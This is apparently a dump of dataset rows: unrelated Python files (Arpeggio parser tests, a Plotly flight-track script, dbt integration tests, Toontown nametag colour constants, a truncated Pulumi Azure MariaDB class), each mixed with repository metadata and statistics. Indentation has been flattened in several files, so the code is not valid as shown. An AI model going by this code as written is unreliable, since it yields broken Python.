62151cb8ef2cfe5113a4388da09892e7714c5e96
|
[
"MIT"
] | null | null | null |
tests/test_eolterm.py
|
bitranox/Arpeggio
|
62151cb8ef2cfe5113a4388da09892e7714c5e96
|
[
"MIT"
] | null | null | null |
# stdlib
from typing import Any
# proj
from arpeggio import *
def test_zeroormore_eolterm() -> None:
def grammar() -> Any: return first, second, EOF
def first() -> Any: return ZeroOrMore(["a", "b"], eolterm=True)
def second() -> Any: return "a"
# first rule should match only first line
# so that second rule will match "a" on the new line
input = """a a b a b b
a"""
parser = ParserPython(grammar, reduce_tree=False)
result = parser.parse(input)
assert result
def test_oneormore_eolterm() -> None:
def grammar() -> Any: return first, second, EOF
def first() -> Any: return OneOrMore(["a", "b"], eolterm=True)
def second() -> Any: return "a"
# first rule should match only first line
# so that second rule will match "a" on the new line
input = """a a a b a
a"""
parser = ParserPython(grammar, reduce_tree=False)
result = parser.parse(input)
assert result
| 24.65
| 74
| 0.612576
| 136
| 986
| 4.397059
| 0.301471
| 0.090301
| 0.046823
| 0.070234
| 0.822742
| 0.822742
| 0.822742
| 0.822742
| 0.822742
| 0.822742
| 0
| 0
| 0.272819
| 986
| 39
| 75
| 25.282051
| 0.834031
| 0.19574
| 0
| 0.6
| 0
| 0
| 0.049618
| 0
| 0
| 0
| 0
| 0
| 0.1
| 1
| 0.4
| false
| 0
| 0.1
| 0.3
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 8
|
91a349e24c7a5127eb7503afd39e8a1d63dde772
| 4,306
|
py
|
Python
|
python/impacts.py
|
alexkenan/nasa_impacts
|
cfd9dc823bfe93fd13874137f38c212ad343a483
|
[
"MIT"
] | null | null | null |
python/impacts.py
|
alexkenan/nasa_impacts
|
cfd9dc823bfe93fd13874137f38c212ad343a483
|
[
"MIT"
] | null | null | null |
python/impacts.py
|
alexkenan/nasa_impacts
|
cfd9dc823bfe93fd13874137f38c212ad343a483
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
#####################################
# LAST UPDATED 09 MAR 2021 #
#####################################
"""
Use Plotly for aircraft data analysis. Data from
https://catalog.data.gov/dataset/p-3-meteorological-and-navigation-data-impacts-v1
https://catalog.data.gov/dataset/er-2-navigation-data-impacts-v1
"""
import plotly.graph_objects as go
import pandas as pd
list_of_files = [
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_ER2_20200115_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_ER2_20200118_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_ER2_20200125_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_ER2_20200201_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_ER2_20200205_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_ER2_20200207_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_ER2_20200223_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_ER2_20200225_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_ER2_20200227_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_ER2_20200302_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_P3B_20200112_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_P3B_20200118_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_P3B_20200125_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_P3B_20200201_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_P3B_20200205_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_P3B_20200207_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_P3B_20200213_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_P3B_20200218_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_P3B_20200220_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_P3B_20200224_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_P3B_20200225_R0.csv']
for i in range(len(list_of_files)):
df = pd.read_csv(list_of_files[i])
# next two lines are necessary to eliminate position data errors
df['Longitude'] = df['Longitude'].replace(-9999.0, None)
df['Latitude'] = df['Latitude'].replace(-9999.0, None)
fig = go.Figure()
counter = 30
fig.add_trace(go.Scattermapbox(mode="lines", lat=df['Latitude'].dropna(),
lon=df['Longitude'].dropna(), showlegend=False,
line={'color': 'gray'},
name=""))
fig.add_trace(go.Scattermapbox(mode="markers+lines", lon=df['Longitude'].head(counter).dropna(),
lat=df['Latitude'].head(counter).dropna(),
showlegend=True,
marker={'size': 6, 'color': 'blue'},
name="Start"))
fig.add_trace(go.Scattermapbox(mode="markers+lines", lon=df['Longitude'].tail(counter).dropna(),
lat=df['Latitude'].tail(counter).dropna(),
showlegend=True,
marker={'size': 6, 'color': 'red'},
name="End"))
fig.update_layout(
margin={'l': 0, 't': 0, 'b': 0, 'r': 0},
mapbox={'center': {'lon': -100, 'lat': 40},
'style': "carto-positron",
'zoom': 3},
geo_scope="usa")
fig.show()
| 64.268657
| 112
| 0.678356
| 523
| 4,306
| 5.359465
| 0.256214
| 0.059936
| 0.187299
| 0.209775
| 0.752051
| 0.714948
| 0.704245
| 0.704245
| 0.673564
| 0.673564
| 0
| 0.068378
| 0.167905
| 4,306
| 66
| 113
| 65.242424
| 0.713927
| 0.073386
| 0
| 0.039216
| 0
| 0
| 0.616035
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.039216
| 0
| 0.039216
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
91b9336b12d3de59143975de19db4fed8c23a8d8
| 7,830
|
py
|
Python
|
test/integration/003_simple_reference_test/test_simple_reference.py
|
managedbyq/q-dbt
|
01f1918fe5cbf3036b7197b8e3211960403718f3
|
[
"Apache-2.0"
] | 1
|
2021-01-28T16:40:37.000Z
|
2021-01-28T16:40:37.000Z
|
test/integration/003_simple_reference_test/test_simple_reference.py
|
managedbyq/q-dbt
|
01f1918fe5cbf3036b7197b8e3211960403718f3
|
[
"Apache-2.0"
] | null | null | null |
test/integration/003_simple_reference_test/test_simple_reference.py
|
managedbyq/q-dbt
|
01f1918fe5cbf3036b7197b8e3211960403718f3
|
[
"Apache-2.0"
] | null | null | null |
from nose.plugins.attrib import attr
from test.integration.base import DBTIntegrationTest
class TestSimpleReference(DBTIntegrationTest):
def setUp(self):
pass
@property
def schema(self):
return "simple_reference_003"
@property
def models(self):
return "test/integration/003_simple_reference_test/models"
@attr(type='postgres')
def test__postgres__simple_reference(self):
self.use_default_project()
self.use_profile('postgres')
self.run_sql_file("test/integration/003_simple_reference_test/seed.sql")
self.run_dbt()
# Copies should match
self.assertTablesEqual("seed","incremental_copy")
self.assertTablesEqual("seed","materialized_copy")
self.assertTablesEqual("seed","view_copy")
# Summaries should match
self.assertTablesEqual("summary_expected","incremental_summary")
self.assertTablesEqual("summary_expected","materialized_summary")
self.assertTablesEqual("summary_expected","view_summary")
self.assertTablesEqual("summary_expected","ephemeral_summary")
self.run_sql_file("test/integration/003_simple_reference_test/update.sql")
self.run_dbt()
# Copies should match
self.assertTablesEqual("seed","incremental_copy")
self.assertTablesEqual("seed","materialized_copy")
self.assertTablesEqual("seed","view_copy")
# Summaries should match
self.assertTablesEqual("summary_expected","incremental_summary")
self.assertTablesEqual("summary_expected","materialized_summary")
self.assertTablesEqual("summary_expected","view_summary")
self.assertTablesEqual("summary_expected","ephemeral_summary")
@attr(type='snowflake')
def test__snowflake__simple_reference(self):
self.use_default_project()
self.use_profile('snowflake')
self.run_sql_file("test/integration/003_simple_reference_test/seed.sql")
self.run_dbt()
# Copies should match
self.assertTablesEqual("seed","incremental_copy")
self.assertTablesEqual("seed","materialized_copy")
self.assertTablesEqual("seed","view_copy")
# Summaries should match
self.assertTablesEqual("summary_expected","incremental_summary")
self.assertTablesEqual("summary_expected","materialized_summary")
self.assertTablesEqual("summary_expected","view_summary")
self.assertTablesEqual("summary_expected","ephemeral_summary")
self.run_sql_file("test/integration/003_simple_reference_test/update.sql")
self.run_dbt()
# Copies should match
self.assertTablesEqual("seed","incremental_copy")
self.assertTablesEqual("seed","materialized_copy")
self.assertTablesEqual("seed","view_copy")
# Summaries should match
self.assertTablesEqual("summary_expected","incremental_summary")
self.assertTablesEqual("summary_expected","materialized_summary")
self.assertTablesEqual("summary_expected","view_summary")
self.assertTablesEqual("summary_expected","ephemeral_summary")
@attr(type='postgres')
def test__postgres__simple_reference_with_models(self):
self.use_default_project()
self.use_profile('postgres')
self.run_sql_file("test/integration/003_simple_reference_test/seed.sql")
# Run materialized_copy, ephemeral_copy, and their dependents
# ephemeral_copy should not actually be materialized b/c it is ephemeral
self.run_dbt(['run', '--models', 'materialized_copy', 'ephemeral_copy'])
# Copies should match
self.assertTablesEqual("seed","materialized_copy")
created_models = self.get_models_in_schema()
self.assertTrue('materialized_copy' in created_models)
@attr(type='postgres')
def test__postgres__simple_reference_with_models_and_children(self):
self.use_default_project()
self.use_profile('postgres')
self.run_sql_file("test/integration/003_simple_reference_test/seed.sql")
# Run materialized_copy, ephemeral_copy, and their dependents
# ephemeral_copy should not actually be materialized b/c it is ephemeral
# the dependent ephemeral_summary, however, should be materialized as a table
self.run_dbt(['run', '--models', 'materialized_copy+', 'ephemeral_copy+'])
# Copies should match
self.assertTablesEqual("seed","materialized_copy")
# Summaries should match
self.assertTablesEqual("summary_expected","materialized_summary")
self.assertTablesEqual("summary_expected","ephemeral_summary")
created_models = self.get_models_in_schema()
self.assertFalse('incremental_copy' in created_models)
self.assertFalse('incremental_summary' in created_models)
self.assertFalse('view_copy' in created_models)
self.assertFalse('view_summary' in created_models)
# make sure this wasn't errantly materialized
self.assertFalse('ephemeral_copy' in created_models)
self.assertTrue('materialized_copy' in created_models)
self.assertTrue('materialized_summary' in created_models)
self.assertEqual(created_models['materialized_copy'], 'table')
self.assertEqual(created_models['materialized_summary'], 'table')
self.assertTrue('ephemeral_summary' in created_models)
self.assertEqual(created_models['ephemeral_summary'], 'table')
@attr(type='snowflake')
def test__snowflake__simple_reference_with_models(self):
self.use_default_project()
self.use_profile('snowflake')
self.run_sql_file("test/integration/003_simple_reference_test/seed.sql")
# Run materialized_copy & ephemeral_copy
# ephemeral_copy should not actually be materialized b/c it is ephemeral
self.run_dbt(['run', '--models', 'materialized_copy', 'ephemeral_copy'])
# Copies should match
self.assertTablesEqual("seed","materialized_copy")
created_models = self.get_models_in_schema()
self.assertTrue('materialized_copy' in created_models)
@attr(type='snowflake')
def test__snowflake__simple_reference_with_models_and_children(self):
self.use_default_project()
self.use_profile('snowflake')
self.run_sql_file("test/integration/003_simple_reference_test/seed.sql")
# Run materialized_copy, ephemeral_copy, and their dependents
# ephemeral_copy should not actually be materialized b/c it is ephemeral
# the dependent ephemeral_summary, however, should be materialized as a table
self.run_dbt(['run', '--models', 'materialized_copy+', 'ephemeral_copy+'])
# Copies should match
self.assertTablesEqual("seed","materialized_copy")
# Summaries should match
self.assertTablesEqual("summary_expected","materialized_summary")
self.assertTablesEqual("summary_expected","ephemeral_summary")
created_models = self.get_models_in_schema()
self.assertFalse('incremental_copy' in created_models)
self.assertFalse('incremental_summary' in created_models)
self.assertFalse('view_copy' in created_models)
self.assertFalse('view_summary' in created_models)
# make sure this wasn't errantly materialized
self.assertFalse('ephemeral_copy' in created_models)
self.assertTrue('materialized_copy' in created_models)
self.assertTrue('materialized_summary' in created_models)
self.assertEqual(created_models['materialized_copy'], 'table')
self.assertEqual(created_models['materialized_summary'], 'table')
self.assertTrue('ephemeral_summary' in created_models)
self.assertEqual(created_models['ephemeral_summary'], 'table')
| 41.648936
| 85
| 0.716092
| 848
| 7,830
| 6.311321
| 0.091981
| 0.141256
| 0.104634
| 0.134529
| 0.961136
| 0.961136
| 0.954223
| 0.954223
| 0.949552
| 0.942638
| 0
| 0.004694
| 0.18378
| 7,830
| 187
| 86
| 41.871658
| 0.832734
| 0.132822
| 0
| 0.869565
| 0
| 0
| 0.316575
| 0.068165
| 0
| 0
| 0
| 0
| 0.521739
| 1
| 0.078261
| false
| 0.008696
| 0.017391
| 0.017391
| 0.121739
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
91bda6558bb7a508cf12d3c70684c8ef05f1f0ee
| 7,520
|
py
|
Python
|
v2.5.7/otp/nametag/NametagConstants.py
|
TTOFFLINE-LEAK/ttoffline
|
bb0e91704a755d34983e94288d50288e46b68380
|
[
"MIT"
] | 4
|
2019-07-01T15:46:43.000Z
|
2021-07-23T16:26:48.000Z
|
v2.5.7/otp/nametag/NametagConstants.py
|
TTOFFLINE-LEAK/ttoffline
|
bb0e91704a755d34983e94288d50288e46b68380
|
[
"MIT"
] | 1
|
2019-06-29T03:40:05.000Z
|
2021-06-13T01:15:16.000Z
|
v2.5.7/otp/nametag/NametagConstants.py
|
TTOFFLINE-LEAK/ttoffline
|
bb0e91704a755d34983e94288d50288e46b68380
|
[
"MIT"
] | 4
|
2019-07-28T21:18:46.000Z
|
2021-02-25T06:37:25.000Z
|
CFSpeech = 1
CFThought = 2
CFQuicktalker = 4
CFTimeout = 8
CFPageButton = 16
CFQuitButton = 32
CFReversed = 64
CFSndOpenchat = 128
CFNoQuitButton = 256
CFExclaim = 512
CCNormal = 0
CCNoChat = 1
CCNonPlayer = 2
CCSuit = 3
CCToonBuilding = 4
CCSuitBuilding = 5
CCHouseBuilding = 6
CCSpeedChat = 7
CCFreeChat = 8
NAMETAG_COLORS = {CCNormal: (
(
(0.3, 0.3, 0.7, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.3, 0.3, 0.7, 1.0), (0.2, 0.2, 0.2, 0.6),
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.5, 0.5, 1.0, 1.0), (1.0, 1.0, 1.0, 1.0),
(0.0, 0.6, 0.6, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.3, 0.3, 0.7, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0))),
CCNoChat: (
(
(0.6, 0.4, 0.2, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.6, 0.4, 0.2, 1.0), (0.2, 0.2, 0.2, 0.6),
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.8, 0.6, 0.4, 1.0), (1.0, 1.0, 1.0, 1.0),
(0.0, 0.6, 0.6, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.6, 0.4, 0.2, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0))),
CCNonPlayer: (
(
(0.6, 0.4, 0.2, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.6, 0.4, 0.2, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.6, 0.4, 0.2, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.6, 0.4, 0.2, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0))),
CCSuit: (
(
(0.0, 0.0, 0.0, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.0, 0.0, 0.0, 1.0), (0.2, 0.2, 0.2, 0.6),
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.2, 0.2, 0.2, 1.0), (1.0, 1.0, 1.0, 0.7),
(0.0, 0.6, 0.6, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.0, 0.0, 0.0, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0))),
CCSuitBuilding: (
(
(0.5, 0.5, 0.5, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.5, 0.5, 0.5, 1.0), (0.8, 0.8, 0.8, 0.5),
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.5, 0.5, 0.5, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.6, 0.6, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.5, 0.5, 0.5, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0))),
CCToonBuilding: (
(
(0.2, 0.6, 0.9, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.2, 0.6, 0.9, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.2, 0.6, 0.9, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.2, 0.6, 0.9, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0))),
CCHouseBuilding: (
(
(0.2, 0.6, 0.9, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.2, 0.6, 0.9, 1.0), (0.8, 0.8, 0.8, 0.5),
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.2, 0.6, 0.9, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.6, 0.6, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.0, 0.6, 0.2, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0))),
CCSpeedChat: (
(
(0.0, 0.6, 0.2, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.0, 0.5, 0.0, 1.0), (0.5, 0.5, 0.5, 0.6),
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.0, 0.7, 0.2, 1.0), (1.0, 1.0, 1.0, 0.7),
(0.0, 0.6, 0.6, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.0, 0.6, 0.2, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0))),
CCFreeChat: (
(
(0.3, 0.3, 0.7, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.2, 0.2, 0.5, 1.0), (0.2, 0.2, 0.2, 0.6),
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.5, 0.5, 1.0, 1.0), (1.0, 1.0, 1.0, 1.0),
(0.0, 0.6, 0.6, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.3, 0.3, 0.7, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)))}
ARROW_COLORS = {CCSuit: (0.8, 0.4, 0.0, 1.0),
CCNonPlayer: (0.8, 0.4, 0.0, 1.0),
CCNoChat: (0.8, 0.4, 0.0, 1.0)}
DEFAULT_WORDWRAPS = {CCNormal: 7.5,
CCNoChat: 7.5,
CCNonPlayer: 7.5,
CCSuit: 7.5,
CCToonBuilding: 8.5,
CCSuitBuilding: 8.5,
CCHouseBuilding: 10.0,
CCSpeedChat: 7.5,
CCFreeChat: 7.5}
WTNormal = 0
WTQuickTalker = 1
WTSystem = 2
WTBattleSOS = 3
WTEmote = 4
WTToontownBoardingGroup = 5
WTSwagForeman = 6
WHISPER_COLORS = {WTNormal: (
(
(0.0, 0.0, 0.0, 1.0), (0.2, 0.6, 0.8, 0.6)),
(
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 0.8)),
(
(0.0, 0.0, 0.0, 1.0), (0.2, 0.7, 0.9, 0.6)),
(
(0.0, 0.0, 0.0, 1.0), (0.2, 0.7, 0.8, 0.6))),
WTQuickTalker: (
(
(0.0, 0.0, 0.0, 1.0), (0.2, 0.6, 0.8, 0.6)),
(
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 0.8)),
(
(0.0, 0.0, 0.0, 1.0), (0.2, 0.7, 0.9, 0.6)),
(
(0.0, 0.0, 0.0, 1.0), (0.2, 0.7, 0.8, 0.6))),
WTSystem: (
(
(0.0, 0.0, 0.0, 1.0), (0.8, 0.3, 0.6, 0.6)),
(
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 0.8)),
(
(0.0, 0.0, 0.0, 1.0), (0.8, 0.4, 1.0, 0.6)),
(
(0.0, 0.0, 0.0, 1.0), (0.8, 0.3, 0.6, 0.6))),
WTEmote: (
(
(0.0, 0.0, 0.0, 1.0), (0.9, 0.5, 0.1, 0.6)),
(
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 0.8)),
(
(0.0, 0.0, 0.0, 1.0), (0.9, 0.6, 0.2, 0.6)),
(
(0.0, 0.0, 0.0, 1.0), (0.9, 0.6, 0.1, 0.6))),
WTSwagForeman: (
(
(0.0, 0.0, 0.0, 1.0), (1.0, 0.29, 0.6, 0.6)),
(
(1.0, 0.5, 0.5, 1.0), (1.0, 0.9, 1.0, 0.8)),
(
(0.0, 0.0, 0.0, 1.0), (1.0, 0.5, 0.8, 0.6)),
(
(0.0, 0.0, 0.0, 1.0), (1.0, 0.29, 0.6, 0.6)))}
| 37.6
| 66
| 0.288032
| 1,600
| 7,520
| 1.35125
| 0.03125
| 0.300648
| 0.313599
| 0.333025
| 0.705828
| 0.684551
| 0.684551
| 0.683626
| 0.6716
| 0.667438
| 0
| 0.364833
| 0.434309
| 7,520
| 200
| 67
| 37.6
| 0.143394
| 0
| 0
| 0.365
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
91c3f48c84eae4a4ae9cb1b87718a080946cdcad
| 63,480
|
py
|
Python
|
sdk/python/pulumi_azure/mariadb/server.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/mariadb/server.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/mariadb/server.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ServerArgs', 'Server']
@pulumi.input_type
class ServerArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
sku_name: pulumi.Input[str],
version: pulumi.Input[str],
administrator_login: Optional[pulumi.Input[str]] = None,
administrator_login_password: Optional[pulumi.Input[str]] = None,
auto_grow_enabled: Optional[pulumi.Input[bool]] = None,
backup_retention_days: Optional[pulumi.Input[int]] = None,
create_mode: Optional[pulumi.Input[str]] = None,
creation_source_server_id: Optional[pulumi.Input[str]] = None,
geo_redundant_backup_enabled: Optional[pulumi.Input[bool]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
restore_point_in_time: Optional[pulumi.Input[str]] = None,
ssl_enforcement: Optional[pulumi.Input[str]] = None,
ssl_enforcement_enabled: Optional[pulumi.Input[bool]] = None,
storage_mb: Optional[pulumi.Input[int]] = None,
storage_profile: Optional[pulumi.Input['ServerStorageProfileArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a Server resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the MariaDB Server. Changing this forces a new resource to be created.
:param pulumi.Input[str] sku_name: Specifies the SKU Name for this MariaDB Server. The name of the SKU, follows the `tier` + `family` + `cores` pattern (e.g. `B_Gen4_1`, `GP_Gen5_8`). For more information see the [product documentation](https://docs.microsoft.com/en-us/rest/api/mariadb/servers/create#sku).
:param pulumi.Input[str] version: Specifies the version of MariaDB to use. Possible values are `10.2` and `10.3`. Changing this forces a new resource to be created.
:param pulumi.Input[str] administrator_login: The Administrator Login for the MariaDB Server. Changing this forces a new resource to be created.
:param pulumi.Input[str] administrator_login_password: The Password associated with the `administrator_login` for the MariaDB Server.
:param pulumi.Input[bool] auto_grow_enabled: Enable/Disable auto-growing of the storage. Storage auto-grow prevents your server from running out of storage and becoming read-only. If storage auto grow is enabled, the storage automatically grows without impacting the workload. The default value if not explicitly specified is `true`.
:param pulumi.Input[int] backup_retention_days: Backup retention days for the server, supported values are between `7` and `35` days.
:param pulumi.Input[str] create_mode: The creation mode. Can be used to restore or replicate existing servers. Possible values are `Default`, `Replica`, `GeoRestore`, and `PointInTimeRestore`. Defaults to `Default`.
:param pulumi.Input[str] creation_source_server_id: For creation modes other than `Default`, the source server ID to use.
:param pulumi.Input[bool] geo_redundant_backup_enabled: Turn Geo-redundant server backups on/off. This allows you to choose between locally redundant or geo-redundant backup storage in the General Purpose and Memory Optimized tiers. When the backups are stored in geo-redundant backup storage, they are not only stored within the region in which your server is hosted, but are also replicated to a paired data center. This provides better protection and ability to restore your server in a different region in the event of a disaster. This is not supported for the Basic tier.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the MariaDB Server. Changing this forces a new resource to be created.
:param pulumi.Input[bool] public_network_access_enabled: Whether or not public network access is allowed for this server. Defaults to `true`.
:param pulumi.Input[str] restore_point_in_time: When `create_mode` is `PointInTimeRestore`, specifies the point in time to restore from `creation_source_server_id`.
:param pulumi.Input[bool] ssl_enforcement_enabled: Specifies if SSL should be enforced on connections. Possible values are `true` and `false`.
:param pulumi.Input[int] storage_mb: Max storage allowed for a server. Possible values are between `5120` MB (5GB) and `1024000`MB (1TB) for the Basic SKU and between `5120` MB (5GB) and `4096000` MB (4TB) for General Purpose/Memory Optimized SKUs. For more information see the [product documentation](https://docs.microsoft.com/en-us/rest/api/mariadb/servers/create#storageprofile).
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
